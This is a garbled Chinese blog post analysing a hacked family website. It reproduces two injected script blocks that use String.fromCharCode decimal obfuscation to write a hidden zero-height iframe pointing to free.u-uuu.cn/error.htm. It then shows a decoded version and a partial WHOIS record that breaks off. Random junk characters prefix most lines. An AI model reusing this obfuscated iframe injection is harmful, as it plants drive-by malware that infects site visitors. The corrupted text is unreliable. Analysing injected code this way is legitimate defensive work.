首发在我的博客里面,
<4P4u*/o dYL"h.x http://www.areway.cn/?p=175 G5CI<KRK# *q()f\ r7b1- 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
5*1D$mxD" C}_ ojcR <script>t=’60,105,102,114,97,109,101,
;
mZW{j 32,115,114,99,61,104,116,116,112,58,47,47,
[N/"5
[ 102,114,101,101,46,117,45,117,117,117,46,99,
K#pNec 110,47,101,114,114,111,114,46,104,116,109,
DP3PYJ%+B 32,119,105,100,116,104,61,49,48,48,32,104,
JwAYG5W 101,105,103,104,116,61,48,62,60,47,105,102,
LUqB&,a} 114,97,109,101,62′;
go'-5in( t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
dvt9u9Vg= Bh;7C@dq <script>t=’60,105,102,114,97,109,101,32,115,
UE$UR#T'w 114,99,61,104,116,116,112,58,47,47,102,114,
hM{{\yZS 101,101,46,117,45,117,117,117,46,99,110,47,
5u*-L_ 101,114,114,111,114,46,104,116,109,32,119,
=Ur}~w&H8 105,100,116,104,61,49,48,48,32,104,101,105,
~ xft 103,104,116,61,48,62,60,47,105,102,114,97,
>D(R YI 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
+\F'iAs@ document.write(t);</script>
xHz[t6;4; gqu?o&>9 <html xmlns=”
z@B=:tf http://www.w3.org/1999/xhtml Fsif6k=4 “>
rvXWcu -" <head>
!V
i@1E <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
SjwyLc <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
cp#JBHO <title>首页 - 爱生活家庭网
P!+'1KR yIDD@j=l 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
J6L K 转换字符串后的大概内容是(谁点击后果自付):
DX"xy <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
p2DrEId .ys6"V|31 查询玉米u-uuu.cn的详细信息:
9983aFam Domain Name: u-uuu.cn
?e,pN,4 ROID: 20070901s10001s64972306-cn
@U3Vc|
Domain Status: ok
e^<